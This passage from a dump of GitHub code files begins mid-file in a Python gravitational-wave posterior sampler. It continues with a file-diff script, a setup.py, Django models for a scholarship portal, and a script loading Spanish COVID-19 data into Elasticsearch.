high=1.0, size=shape)\n params['cos_tilt2'] = np.random.uniform(low=-1.0, high=1.0, size=shape)\n params['phi1'] = np.random.uniform(low=0.0, high=2.0*np.pi, size=shape)\n params['phi2'] = np.random.uniform(low=0.0, high=2.0*np.pi, size=shape)\n\n params['psdfit'] = np.random.normal(size=shape + (len(self.detectors), self.npsdfit))\n\n return params\n\n def argmax_log_likelihood_tphid(self, params):\n params = self.to_params(params)\n\n df = self.fs[1] - self.fs[0]\n hs = self.generate_waveform(params)\n\n \n dh_dt_cos = 0.0\n dh_dt_sin = 0.0\n hh = 0.0\n adj_psd = self.adjusted_psd(params)\n\n for d, h, psd in zip(self.data, hs, adj_psd):\n conj_d = np.conj(d)\n dh_real = 2.0*df*conj_d*np.real(h)/psd\n dh_imag = 2.0*df*conj_d*np.imag(h)/psd\n\n self.c2r_input_fft_array[:] = dh_real\n self.c2r_fft_plan()\n dh_dt_cos += self.c2r_output_fft_array\n\n self.c2r_input_fft_array[:] = dh_imag\n self.c2r_fft_plan()\n dh_dt_sin += self.c2r_output_fft_array\n\n hh += np.sum(4.0*df*np.abs(h)*np.abs(h)/psd)\n\n\n dh_dt = np.sqrt(dh_dt_cos*dh_dt_cos + dh_dt_sin*dh_dt_sin)\n idt = np.argmax(dh_dt)\n\n if idt == 0:\n a = np.abs(dh_dt[0])\n b = np.abs(dh_dt[1])\n c = np.abs(dh_dt[2])\n i0 = 0\n elif idt == len(dh_dt) - 1:\n a = np.abs(dh_dt[-3])\n b = np.abs(dh_dt[-2])\n c = np.abs(dh_dt[-1])\n i0 = len(dh_dt) - 3\n else:\n a = np.abs(dh_dt[idt-1])\n b = np.abs(dh_dt[idt])\n c = np.abs(dh_dt[idt+1])\n i0 = idt-1\n\n imax = i0 + 0.5 + (a-b)/(a+c-2.0*b)\n\n dt_max = imax/float(self.srate)\n dphi_max = -0.5*np.arctan2(dh_dt_sin[idt], dh_dt_cos[idt])\n\n dh_max = np.abs(dh_dt[idt])\n dfactor = hh / dh_max\n logd_max = params['log_dist'] + np.log(dfactor)\n\n max_params = params.copy()\n\n max_params['log_dist'] = logd_max\n\n max_params['phi'] = np.mod(params['phi'] + dphi_max, np.pi)\n if max_params['phi'] < 0:\n max_params['phi'] += np.pi\n\n max_params['time'] = np.mod(params['time'] + dt_max, self.T)\n\n return max_params\n\n def __call__(self, params):\n lp = self.log_prior(params)\n\n if lp == float('-inf'):\n return lp\n\n return lp + self.log_likelihood(params)\n\nclass TimeMarginalizedPosterior(Posterior):\n \"\"\"Posterior that marginalizes out the time variable on each\n likelihood call.\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"See :method:`Posterior.__init__`.\"\"\"\n super(TimeMarginalizedPosterior, self).__init__(*args, **kwargs)\n\n def to_params(self, params):\n try:\n return params.view([('log_mc', np.float),\n ('eta', np.float),\n ('cos_iota', np.float),\n ('phi', np.float),\n ('psi', np.float),\n ('ra', np.float),\n ('sin_dec', np.float),\n ('log_dist', np.float), \n ('a1', np.float),\n ('cos_tilt1', np.float),\n ('phi1', np.float),\n ('a2', np.float),\n ('cos_tilt2', np.float),\n ('phi2', np.float)] + \\\n [('psdfit', np.float, (self.ndetectors, self.npsdfit))])\n except:\n return super(TimeMarginalizedPosterior, self).to_params(params)\n\n @property\n def header(self):\n \"\"\"A useful header describing the parameters for this posterior in text files.\n\n \"\"\"\n\n header = ['log_mc', 'eta', 'cos_iota', 'phi', 'psi', 'ra', 'sin_dec', \n 'log_dist', 'a1', 'cos_tilt1', 'phi1', 'a2', 'cos_tilt2', \n 'phi2']\n\n for d in self.detectors:\n for i in range(self.npsdfit):\n header.append('{0:s}PSD{1:02d}'.format(d,i))\n\n return ' '.join(header)\n\n @property\n def tm_nparams(self):\n return 14 + self.ndetectors*self.npsdfit\n\n def to_super_params(self, params, time=0):\n params = self.to_params(params)\n sps = super(TimeMarginalizedPosterior, self).to_params(np.zeros(params.shape + (self.nparams,)))\n\n for name in params.dtype.names:\n sps[name] = params[name]\n\n sps['time'] = time\n\n return sps\n\n def from_super_params(self, params):\n params = self.to_params(params)\n sps = self.to_params(np.zeros(params.shape+(self.tm_nparams,))).squeeze()\n\n for name in sps.dtype.names:\n sps[name] = params[name]\n\n return sps\n\n def adjusted_psd(self, params):\n pfull = self.to_super_params(params)\n return super(TimeMarginalizedPosterior, self).adjusted_psd(pfull)\n\n def malmquist_snr(self, params):\n \"\"\"See :method:`Posterior.malmquist_snr`.\"\"\"\n p = self.to_super_params(params, time=0)\n\n return super(TimeMarginalizedPosterior, self).malmquist_snr(p)\n\n def time_integrate(self, log_ls):\n \"\"\"Returns the log of the integral of the given log(L) values as a\n function of time, using an analytic, quadratic interpolation\n of the log(L) values.\n\n \"\"\"\n \n full_log_ls = np.zeros(log_ls.shape[0]+1)\n full_log_ls[:-1] = log_ls\n full_log_ls[-1] = log_ls[0]\n\n dt = 1.0/self.srate\n\n # dt*sum(log_ls) = dt*(1/2*fll[0] + fll[1] + ... + fll[N-1] + 1/2*fll[N])\n # This is the trapezoid rule for the integral.\n log_best_integral = logaddexp_sum(log_ls) + np.log(dt)\n\n return log_best_integral\n\n def log_likelihood(self, params):\n \"\"\"Returns the marginalized log-likelihood at the given params (which\n should have all parameters but time).\"\"\"\n \n params = self.to_params(params)\n params_full = self.to_super_params(params, time=0)\n\n hs = self.generate_waveform(params_full)\n\n ll = 0.0\n df = self.fs[1] - self.fs[0]\n\n hh_list = []\n dh_timeshifts = 0.0\n adj_psd = self.adjusted_psd(params)\n for h, d, psd in zip(hs, self.data, adj_psd):\n hh,dd = hh_dd_sum(df, psd, h, d)\n\n hh_list.append(hh)\n\n fill_fft_array(df, psd, d, h, self.c2r_input_fft_array)\n self.c2r_fft_plan()\n dh_timeshifts += self.c2r_output_fft_array\n \n ll += -0.5*(hh + dd)\n ll -= np.sum(np.log(2.0*np.pi*psd[psd != float('inf')]/(4.0*(self.fs[1]-self.fs[0]))))\n\n dh = self.time_integrate(dh_timeshifts)\n ll += dh\n\n # Normalization for time integral\n ll -= np.log(self.T)\n\n if self.msnr is not None:\n if len(hh_list) == 1:\n hh2nd = hh_list[0]\n else:\n hh_list.sort()\n hh2nd = hh_list[-2]\n\n if hh2nd < self.msnr*self.msnr:\n return float('-inf')\n\n return ll\n\n def log_prior(self, params):\n \"\"\"Log prior; same as :method:`Posterior.log_prior`, but without\n `time` column.\n\n \"\"\"\n \n params = self.to_params(params)\n params_full = self.to_super_params(params, time = 0.5*self.T)\n\n return super(TimeMarginalizedPosterior, self).log_prior(params_full)\n\n def draw_prior(self, shape=(1,)):\n pfull = super(TimeMarginalizedPosterior, self).draw_prior(shape=shape)\n return self.from_super_params(pfull)\n\n def argmax_log_likelihood_phid(self, params):\n params_full = self.to_super_params(params, time = 0.5*self.T)\n \n p = self.from_super_params(super(TimeMarginalizedPosterior, self).argmax_log_likelihood_tphid(params_full))\n\n return p\n\nclass NoiseOnlyPosterior(Posterior):\n \"\"\"Represents the posterior for a noise-only model.\n\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(NoiseOnlyPosterior, self).__init__(*args, **kwargs)\n\n @property\n def header(self):\n header = []\n for d in self.detectors:\n for i in range(self.npsdfit):\n header.append('{0:s}PSD{1:02d}'.format(d,i))\n\n return ' '.join(header)\n\n\n @property\n def no_nparams(self):\n return self.ndetectors*self.npsdfit\n\n def to_params(self, params):\n try:\n return params.view([('psdfit', np.float, (self.ndetectors, self.npsdfit))])\n except:\n return super(NoiseOnlyPosterior, self).to_params(params)\n\n def generate_waveform(self, params):\n if params.view(float).shape[0] == self.no_nparams:\n hs = []\n for d in self.data:\n hs.append(0.0*d)\n return hs\n else:\n return super(NoiseOnlyPosterior, self).generate_waveform(params)\n\n def log_prior(self, params):\n return np.sum(u.norm_logpdf(params))\n\n def draw_prior(self, shape=(1,)):\n return self.to_params(np.random.normal(size=shape+(self.ndetectors*self.npsdfit,)))\n\n \n","repo_name":"farr/nu-ligo-utils","sub_path":"ensemble-sampler/posterior.py","file_name":"posterior.py","file_ext":"py","file_size_in_byte":37170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"70724901870","text":"#!/usr/bin/env python\n\nc1 = open(\"Comp1.txt\", \"r\")\nc2 = open(\"Comp2.txt\", \"r\")\narchivoUno = c1.readlines()\narchivoDos = c2.readlines()\nc1.close()\nc2.close()\nresult = open(\"resultado.txt\", \"w\")\n\nx = 0\nfor i in archivoUno:\n if i != archivoDos[x]:\n result.write(i+\"El otro archivo contiene >> \"+archivoDos[x])\n x += 1\n\n\t\nresult.close()","repo_name":"jetsky0/projectvoteredes","sub_path":"huellas_ordinario.py","file_name":"huellas_ordinario.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"23708278234","text":"from setuptools import setup, find_packages\n\nwith open('README.md') as f:\n readme = f.read()\n\nwith open('LICENSE.md') as f:\n license = f.read()\n\nrequirements = [\n 'numpy',\n 'matplotlib',\n 'pretty_midi',\n 'pyFluidSynth >= 1.2.5',\n 'librosa',\n 'essentia',\n 'keras',\n 'tensorflow',\n]\n\nsetup(\n name='mai',\n version='0.0.1',\n description='Music and Artificial Intelligence',\n long_description=readme,\n author='David Kant',\n author_email='dkant@ucsc.edu',\n url='https://canvas.ucsc.edu/courses/12767',\n license=license,\n packages=find_packages(exclude=('tests', 'docs')),\n install_requires=requirements\n)\n","repo_name":"davidkant/mai","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"38"}
+{"seq_id":"71450660271","text":"from uuid import uuid4\n\nimport pdfkit\nfrom django.conf import settings\nfrom django.contrib.staticfiles import finders\nfrom django.core.validators import (\n MaxValueValidator,\n MinValueValidator,\n FileExtensionValidator,\n)\nfrom django.db import models\nfrom django.template.loader import render_to_string\n\nfrom accounts.models import UserAccount, Student, Session\n\nSTATE_CHOICES = (\n (\"Andhra Pradesh\", \"Andhra Pradesh\"),\n (\"Arunachal Pradesh\", \"Arunachal Pradesh\"),\n (\"Assam\", \"Assam\"),\n (\"Bihar\", \"Bihar\"),\n (\"Chhattisgarh\", \"Chhattisgarh\"),\n (\"Goa\", \"Goa\"),\n (\"Gujarat\", \"Gujarat\"),\n (\"Haryana\", \"Haryana\"),\n (\"Himachal Pradesh\", \"Himachal Pradesh\"),\n (\"Jharkhand\", \"Jharkhand\"),\n (\"Karnataka\", \"Karnataka\"),\n (\"Kerala\", \"Kerala\"),\n (\"Madhya Pradesh\", \"Madhya Pradesh\"),\n (\"Maharashtra\", \"Maharashtra\"),\n (\"Manipur\", \"Manipur\"),\n (\"Meghalaya\", \"Meghalaya\"),\n (\"Mizoram\", \"Mizoram\"),\n (\"Nagaland\", \"Nagaland\"),\n (\"Odisha\", \"Odisha\"),\n (\"Punjab\", \"Punjab\"),\n (\"Rajasthan\", \"Rajasthan\"),\n (\"Sikkim\", \"Sikkim\"),\n (\"Tamil Nadu\", \"Tamil Nadu\"),\n (\"Telangana\", \"Telangana\"),\n (\"Tripura\", \"Tripura\"),\n (\"Uttarakhand\", \"Uttarakhand\"),\n (\"Uttar Pradesh\", \"Uttar Pradesh\"),\n (\"West Bengal\", \"West Bengal\"),\n (\"Andaman and Nicobar Islands\", \"Andaman and Nicobar Islands\"),\n (\"Chandigarh\", \"Chandigarh\"),\n (\n \"Dadra and Nagar Haveli and Daman & Diu\",\n \"Dadra and Nagar Haveli and Daman & Diu\",\n ),\n (\"The Government of NCT of Delhi\", \"The Government of NCT of Delhi\"),\n (\"Jammu & Kashmir\", \"Jammu & Kashmir\"),\n (\"Ladakh\", \"Ladakh\"),\n (\"Lakshadweep\", \"Lakshadweep\"),\n (\"Puducherry\", \"Puducherry\"),\n)\n\n\nclass Constraint(models.Model):\n name = models.CharField(max_length=1024)\n description = models.TextField(blank=True, null=True)\n required = models.BooleanField(default=True)\n\n def __str__(self):\n return self.name\n\n\nclass ScholarshipCategory(models.Model):\n name = models.CharField(max_length=1024)\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name_plural = \"Scholarship Categories\"\n\n\nclass Scholarship(models.Model):\n class ScholarshipType(models.IntegerChoices):\n # NOTE: don't change the integer values\n MCM_TIET = 1\n MCM_ALUMNI = 2\n MCM_OTHER = 3\n MERIT_ALUMNI = 4\n MERIT_AUTO = 5\n\n name = models.CharField(max_length=200)\n category = models.ForeignKey(ScholarshipCategory, on_delete=models.CASCADE)\n scholarship_type = models.IntegerField(choices=ScholarshipType.choices)\n\n eligibility_criteria = models.TextField()\n number_of_scholarships = models.CharField(max_length=1024)\n value_of_scholarship = models.TextField()\n\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n constraints = models.ManyToManyField(Constraint, through=\"ScholarshipConstraint\")\n\n def __str__(self):\n return self.name\n\n @property\n def verbose_type(self):\n if self.scholarship_type == 1:\n return \"MCM_TIET\"\n elif self.scholarship_type == 2:\n return \"MCM_ALUMNI\"\n elif self.scholarship_type == 3:\n return \"MCM_OTHER\"\n elif self.scholarship_type == 4:\n return \"MERIT_ALUMNI\"\n else:\n return \"MERIT_AUTO\"\n\n\nclass ScholarshipConstraint(models.Model):\n scholarship = models.ForeignKey(Scholarship, on_delete=models.CASCADE)\n constraint = models.ForeignKey(Constraint, on_delete=models.CASCADE)\n min_value = models.FloatField(blank=True, null=True)\n max_value = models.FloatField(blank=True, null=True)\n\n def __str__(self):\n return f\"{self.constraint.name} constraint on [{self.scholarship.name}]\"\n\n\nclass MCMTietApplication(models.Model):\n \"\"\"Scholarship Type: MCM_TIET = 1\"\"\"\n\n student = models.ForeignKey(Student, on_delete=models.CASCADE)\n scholarship = models.ForeignKey(Scholarship, on_delete=models.CASCADE)\n contact_number = models.PositiveIntegerField()\n alternate_contact_number = models.PositiveIntegerField()\n state_of_residence = models.CharField(choices=STATE_CHOICES, max_length=255)\n\n class_12_marks = models.CharField(\n max_length=255, help_text=\"Enter percentage e.g. 89.8 \"\n ) # % or CGPA\n current_cgpa_or_rank = models.CharField(\n max_length=255, help_text=\"Current CGPA or Rank or Diploma %\"\n )\n\n family_income_per_mcm_application = models.CharField(\n max_length=255, help_text=\"FAMILY INCOME AS MENTIONED IN MCM APPLICATION FORM\"\n )\n family_income_per_affidavit = models.CharField(\n max_length=255, help_text=\"FAMILY INCOME AS PER AFFIDAVIT ATTACHED\"\n )\n family_income_per_certificate = models.CharField(\n max_length=255, help_text=\"FAMILY INCOME AS PER CERTIFICATE OF TEHSILDAR\"\n )\n bank_balance = models.IntegerField()\n fdr_balance = models.CharField(max_length=255, help_text=\"\")\n\n itr_annual_year_current = models.IntegerField(help_text=\"ITR for this annual year\")\n itr_annual_year_last = models.IntegerField(help_text=\"ITR for previous annual year\")\n itr_annual_year_last_last = models.IntegerField(\n help_text=\"ITR for last to last annual year\"\n )\n\n immovable_property = models.BooleanField(\n help_text=\"IMMOVABLE PROPERTY AS PER AFFIDAVIT\"\n )\n single_girl_child = models.BooleanField(help_text=\"Are you a Single Girl Child?\")\n\n applied_for_mcp_special = models.BooleanField(help_text=\"APPLIED FOR MCM SPECIAL?\")\n mcp_special_reason = models.TextField(\n help_text=\"SPECIFIC REASON FOR APPLYING MCM SPECIAL?\", blank=True, null=True\n )\n\n applied_for_other_scholarship = models.BooleanField(\n help_text=\"HAVE YOU APPLIED FOR ANY OTHER SCHOLARSHIP?\"\n )\n other_scholarship_details = models.TextField(\n help_text=\"DETAILS OF OTHER SCHOLARSHIP APPLIED\", blank=True, null=True\n )\n\n previous_year_scholarship = models.BooleanField(\n help_text=\"HAVE YOU RECEIVED ANY SCHOLARSHIP IN THE PREVIOUS YEAR?\"\n )\n previous_year_scholarship_details = models.TextField(\n help_text=\"DETAILS OF PREVIOUS SCHOLARSHIP RECEIVED\", blank=True, null=True\n )\n previous_year_scholarship_amount = models.IntegerField(\n help_text=\"AMOUNT OF THE PREVIOUS SCHOLARSHIP\", blank=True, null=True\n )\n\n income_certificate = models.FileField(\n help_text=\"Please upload a digital / scanned copy of your income certificate\",\n upload_to=\"income_certificates\",\n validators=[\n FileExtensionValidator(allowed_extensions=[\"pdf\", \"jpg\", \"png\", \"jpeg\"])\n ],\n )\n supporting_documents = models.FileField(\n help_text=\"Please upload supporting documents in a .zip format, if any\",\n blank=True,\n null=True,\n upload_to=\"supporting_documents\",\n )\n\n declaration = models.BooleanField(\n help_text=\"I acknowledge that i have read all the eligibility criteria of scholarship and i am eligible for \"\n \"applying to TIET Merit-cum-means scholarship.\"\n )\n\n status = models.CharField(\n max_length=1024,\n default=\"PENDING\",\n choices=(\n (\"PENDING\", \"PENDING\"),\n (\"APPROVED\", \"APPROVED\"),\n (\"REJECTED\", \"REJECTED\"),\n ),\n )\n remarks = models.TextField(blank=True, null=True)\n\n # TODO: fill more fields, https://docs.google.com/forms/d/e/1FAIpQLScSaU3NGIu13V4j9fEi5B1Djl503c72o9sZ-9YsVY1_hsM4aA/viewform\n\n def __str__(self):\n return f\"Application for [{self.scholarship.name[:15]}...]\"\n\n class Meta:\n verbose_name_plural = \"Merit cum Means Applications\"\n verbose_name = \"Merit cum means Application\"\n\n\nclass MCMAlumniApplication(models.Model):\n \"\"\"Scholarship Type: MCM_ALUMNI = 2\"\"\"\n\n student = models.ForeignKey(Student, on_delete=models.CASCADE)\n scholarship = models.ForeignKey(Scholarship, on_delete=models.CASCADE)\n\n photograph = models.FileField(\n help_text=\"Passport size photograph in JPG/PNG under 2 MB.\",\n blank=True,\n null=True,\n upload_to=\"photographs\",\n )\n\n roll_no = models.CharField(max_length=20, help_text=\"Registration/Roll No\")\n personal_contact_number = models.PositiveIntegerField()\n year = models.CharField(max_length=20, help_text=\"Year\")\n branch = models.CharField(max_length=20, help_text=\"Branch\")\n\n jee_main_rank = models.CharField(max_length=255, help_text=\"JEE Main Rank\")\n current_cgpa = models.CharField(max_length=255, help_text=\"Current CGPA\")\n\n father_name = models.CharField(max_length=255, help_text=\"Father's Name\")\n father_profession = models.CharField(\n max_length=255, help_text=\"Father's Profession\"\n )\n father_contact_number = models.PositiveIntegerField(\n help_text=\"Father's Contact Number\"\n )\n\n mother_name = models.CharField(max_length=255, help_text=\"Mother's Name\")\n mother_profession = models.CharField(\n max_length=255, help_text=\"Mother's Profession\"\n )\n\n mother_contact_number = models.PositiveIntegerField(\n help_text=\"Mother's Contact Number\"\n )\n\n family_income_per_annum = models.CharField(\n max_length=255, help_text=\"Family income per annum\"\n )\n\n bank_name = models.CharField(max_length=255, help_text=\"Student's Bank Name\")\n bank_account_number = models.CharField(\n max_length=255, help_text=\"Bank Savings Account Number\"\n )\n banK_address = models.CharField(max_length=255, help_text=\"Bank Branch Address\")\n bank_ifsc_code = models.CharField(max_length=255, help_text=\"Bank IFSC Code\")\n\n declaration = models.BooleanField(\n help_text=\"I acknowledge that I have read all the eligibility criteria of this scholarship and I am eligible \"\n \"for applying to this scholarship.\"\n )\n\n status = models.CharField(\n max_length=1024,\n default=\"PENDING\",\n choices=(\n (\"PENDING\", \"PENDING\"),\n (\"APPROVED\", \"APPROVED\"),\n (\"REJECTED\", \"REJECTED\"),\n ),\n )\n remarks = models.TextField(blank=True, null=True)\n\n def __str__(self):\n return f\"Application for [{self.scholarship.name[:15]}...]\"\n\n class Meta:\n verbose_name_plural = \"Merit cum Means Alumni Applications\"\n verbose_name = \"Merit cum Means Alumni Application\"\n\n\nclass MCMOtherApplication(models.Model):\n \"\"\"Scholarship Type: MCM_OTHER = 3\"\"\"\n\n student = models.ForeignKey(Student, on_delete=models.CASCADE)\n scholarship = models.ForeignKey(Scholarship, on_delete=models.CASCADE)\n\n photograph = models.FileField(\n help_text=\"Passport size photograph in JPG/PNG under 2 MB.\",\n blank=True,\n null=True,\n upload_to=\"photographs\",\n )\n\n roll_no = models.CharField(max_length=20, help_text=\"Registration/Roll No\")\n personal_contact_number = models.PositiveIntegerField()\n year = models.CharField(max_length=20, help_text=\"Year\")\n branch = models.CharField(max_length=20, help_text=\"Branch\")\n\n jee_main_rank = models.CharField(max_length=255, help_text=\"JEE Main Rank\")\n current_cgpa = models.CharField(max_length=255, help_text=\"Current CGPA\")\n\n father_name = models.CharField(max_length=255, help_text=\"Father's Name\")\n father_profession = models.CharField(\n max_length=255, help_text=\"Father's Profession\"\n )\n father_contact_number = models.PositiveIntegerField(\n help_text=\"Father's Contact Number\"\n )\n\n mother_name = models.CharField(max_length=255, help_text=\"Mother's Name\")\n mother_profession = models.CharField(\n max_length=255, help_text=\"Mother's Profession\"\n )\n\n mother_contact_number = models.PositiveIntegerField(\n help_text=\"Mother's Contact Number\"\n )\n\n family_income_per_annum = models.CharField(\n max_length=255, help_text=\"Family income per annum\"\n )\n\n bank_name = models.CharField(max_length=255, help_text=\"Student's Bank Name\")\n bank_account_number = models.CharField(\n max_length=255, help_text=\"Bank Savings Account Number\"\n )\n banK_address = models.CharField(max_length=255, help_text=\"Bank Branch Address\")\n bank_ifsc_code = models.CharField(max_length=255, help_text=\"Bank IFSC Code\")\n\n declaration = models.BooleanField(\n help_text=\"I acknowledge that I have read all the eligibility criteria of this scholarship and I am eligible \"\n \"for applying to this scholarship.\"\n )\n\n status = models.CharField(\n max_length=1024,\n default=\"PENDING\",\n choices=(\n (\"PENDING\", \"PENDING\"),\n (\"APPROVED\", \"APPROVED\"),\n (\"REJECTED\", \"REJECTED\"),\n ),\n )\n remarks = models.TextField(blank=True, null=True)\n\n def __str__(self):\n return f\"Application for [{self.scholarship.name[:15]}...]\"\n\n class Meta:\n verbose_name_plural = \"Merit cum Means Other Applications\"\n verbose_name = \"Merit cum Means Other Application\"\n\n\nclass NoticeCategory(models.Model):\n id = models.UUIDField(default=uuid4, primary_key=True, unique=True, editable=False)\n title = models.TextField()\n collapsed = models.BooleanField(default=True)\n\n def __str__(self):\n return self.title\n\n class Meta:\n verbose_name_plural = \"Notice Categories\"\n\n\nclass Notice(models.Model):\n id = models.UUIDField(default=uuid4, primary_key=True, unique=True, editable=False)\n category = models.ForeignKey(\n NoticeCategory, on_delete=models.CASCADE, blank=True, null=True\n )\n title = models.TextField()\n attachment = models.FileField(blank=True, null=True, upload_to=\"notice_attachments\")\n link = models.CharField(max_length=1024, blank=True, null=True)\n date = models.DateTimeField(auto_now_add=True, editable=False)\n\n def __str__(self):\n return self.title\n\n\nclass Grievance(models.Model):\n student = models.ForeignKey(Student, on_delete=models.CASCADE)\n subject = models.TextField()\n issue_details = models.TextField()\n date_opened = models.DateTimeField(auto_now_add=True)\n\n resolved = models.BooleanField(default=False)\n remarks = models.TextField(blank=True, null=True)\n\n def __str__(self):\n return self.subject\n\n\nclass ReceivedScholarship(models.Model):\n student = models.ForeignKey(Student, on_delete=models.CASCADE)\n scholarship = models.ForeignKey(Scholarship, on_delete=models.CASCADE)\n session = models.ForeignKey(Session, on_delete=models.CASCADE)\n\n year_of_study = models.CharField(max_length=1024, blank=True, null=True)\n branch = models.CharField(max_length=1024, default=\"UNSPECIFIED\")\n programme = models.CharField(blank=True, null=True, max_length=1024)\n\n current_cgpa = models.FloatField(blank=True, null=True)\n cgpa_1st_semester = models.FloatField(blank=True, null=True)\n cgpa_2nd_semester = models.FloatField(blank=True, null=True)\n cgpa_3rd_semester = models.FloatField(blank=True, null=True)\n sgpa_5th_semester = models.FloatField(blank=True, null=True)\n sgpa_6th_semester = models.FloatField(blank=True, null=True)\n agpa = models.FloatField(blank=True, null=True)\n marks = models.FloatField(blank=True, null=True)\n jee_rank = models.FloatField(blank=True, null=True)\n pcme_percentage = models.FloatField(blank=True, null=True)\n pcb_percentage = models.FloatField(blank=True, null=True)\n ti_rank = models.FloatField(blank=True, null=True)\n tu_rank = models.FloatField(blank=True, null=True)\n twelfth_overall_percentage = models.FloatField(blank=True, null=True)\n\n amount = models.PositiveIntegerField()\n\n def __str__(self):\n return self.scholarship.name + f\" [{self.session.name}]\"\n\n\nclass CertificateRequest(models.Model):\n received_scholarship = models.OneToOneField(ReceivedScholarship, on_delete=models.CASCADE)\n student = models.ForeignKey(Student, on_delete=models.CASCADE)\n date_requested = models.DateTimeField(auto_now=True, editable=False)\n approved = models.BooleanField(default=False)\n date_approved = models.DateTimeField(blank=False, null=True)\n year_of_passing = models.CharField(max_length=1024, blank=False, null=True)\n passing_cgpa = models.CharField(max_length=1024, blank=False, null=True)\n certificate = models.FileField(blank=True, null=True)\n\n def __str__(self):\n return self.received_scholarship.scholarship.name + \": \" + self.received_scholarship.session.name\n\n def save(self, *args, **kwargs):\n if self.approved:\n rendered_certificate = render_to_string(\"pdfs/scholarship_certificate.html\", {\n 'date': self.date_approved.date(),\n 'image_path': finders.find('signature.png'),\n 'ref_no': self.id,\n 'name': self.student.student_name or self.student.user.get_full_name(),\n 'roll_no': self.student.roll_no,\n 'father_name': self.student.father_name,\n 'programme_name': self.student.program_name,\n 'branch': self.student.branch_desc,\n 'passing': self.year_of_passing,\n 'cgpa': self.passing_cgpa,\n 'scholarship': self.received_scholarship.scholarship.name,\n 'amount': self.received_scholarship.amount,\n 'session': self.received_scholarship.session.name\n })\n\n options = {\n 'page-size': 'Letter',\n 'margin-top': '0.75in',\n 'margin-right': '0.75in',\n 'margin-bottom': '0.75in',\n 'margin-left': '0.75in',\n 'encoding': \"UTF-8\",\n 'custom-header': [\n ('Accept-Encoding', 'gzip')\n ],\n 'no-outline': None\n }\n certificate_name = f\"scholarship_certificate_{uuid4()}.pdf\"\n pdfkit.from_string(rendered_certificate,\n settings.MEDIA_ROOT / certificate_name,\n options=options)\n self.certificate.name = certificate_name\n\n super(CertificateRequest, self).save(*args, **kwargs)\n\n\nclass ExcelError:\n\n def __init__(self, row_id, error_msg):\n self.row_id = row_id\n self.error_msg = error_msg\n","repo_name":"MagnumDingusEdu/capstone","sub_path":"website/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":18324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"71844702829","text":"from datetime import datetime\nimport csv\nimport requests\nfrom elasticsearch import Elasticsearch\n\n\ndef formatCCAA(ccaa):\n if ccaa == \"C. Valenciana\":\n ccaa = \"Comunidad Valenciana\"\n elif ccaa == \"Madrid\":\n ccaa = \"Comunidad de Madrid\"\n elif ccaa == \"Murcia\":\n ccaa = \"Región de Murcia\"\n elif ccaa == \"Baleares\":\n ccaa = \"Islas Baleares\"\n\n return ccaa\n\n\n# Spain urls\nurl_altas_spain = \"https://raw.githubusercontent.com/datadista/datasets/master/COVID%2019/ccaa_covid19_altas.csv\"\nurl_casos_spain = \"https://raw.githubusercontent.com/datadista/datasets/master/COVID%2019/ccaa_covid19_casos.csv\"\nurl_fallecidos_spain = \"https://raw.githubusercontent.com/datadista/datasets/master/COVID%2019/ccaa_covid19_fallecidos.csv\"\nurl_uci_spain = \"https://raw.githubusercontent.com/datadista/datasets/master/COVID%2019/ccaa_covid19_uci.csv\"\n\n\n# CCAA\nurl_ccaa_cyl = \"https://datosabiertos.jcyl.es/web/jcyl/risp/es/sector-publico/situacion-epidemiologica-coronavirus/1284940407131.csv\"\n\n\ndef save_elasticsearch_es(index, result_data):\n\n es = Elasticsearch()\n\n es.indices.create(\n index=index,\n ignore=400 # ignore 400 already exists code\n )\n print(result_data)\n\n id_case = str(result_data['date'].timestamp()) + \\\n '-'+result_data['CCAA']+'-'+result_data['type']\n es.index(index=index, id=id_case, body=result_data)\n\n\ndef get_data_csv_spain(base_url, index, case_type):\n '''\n :param base_url:\n :param index:\n :param type:\n\n '''\n\n with requests.get(base_url, stream=True) as r:\n lines = (line.decode('utf-8') for line in r.iter_lines())\n datasheets = list(csv.reader(lines))\n\n # Removing last lien with the Total\n del datasheets[-1]\n\n dateframe = datasheets[0][2:]\n for row in datasheets[1:]:\n ccaa = formatCCAA(row[1])\n\n result_data = {\n 'CCAA': ccaa,\n 'country': 'Spain',\n }\n\n previousData = 0\n infection_day_100 = 0\n\n for day, data in zip(dateframe, row[2:]):\n dataAux = int(data)\n data = int(data) - previousData\n previousData = dataAux\n\n if dataAux >= 100:\n infection_day_100 += 1\n\n result_data.update(\n date=datetime.strptime(day, \"%Y-%m-%d\"),\n type=case_type,\n count_case=int(data),\n total_case=dataAux,\n rate_100_infection=infection_day_100\n )\n save_elasticsearch_es(index, result_data)\n\n\nif __name__ == '__main__':\n\n # COVID Spain\n index_name = 'covid_spain'\n get_data_csv_spain(url_altas_spain, index_name, 'recuperado')\n get_data_csv_spain(url_casos_spain, index_name, 'confirmado')\n get_data_csv_spain(url_fallecidos_spain, index_name, 'fallecido')\n get_data_csv_spain(url_uci_spain, index_name, 'uci')\n","repo_name":"david-morenomoreno/COVID19","sub_path":"covidSpain.py","file_name":"covidSpain.py","file_ext":"py","file_size_in_byte":2988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
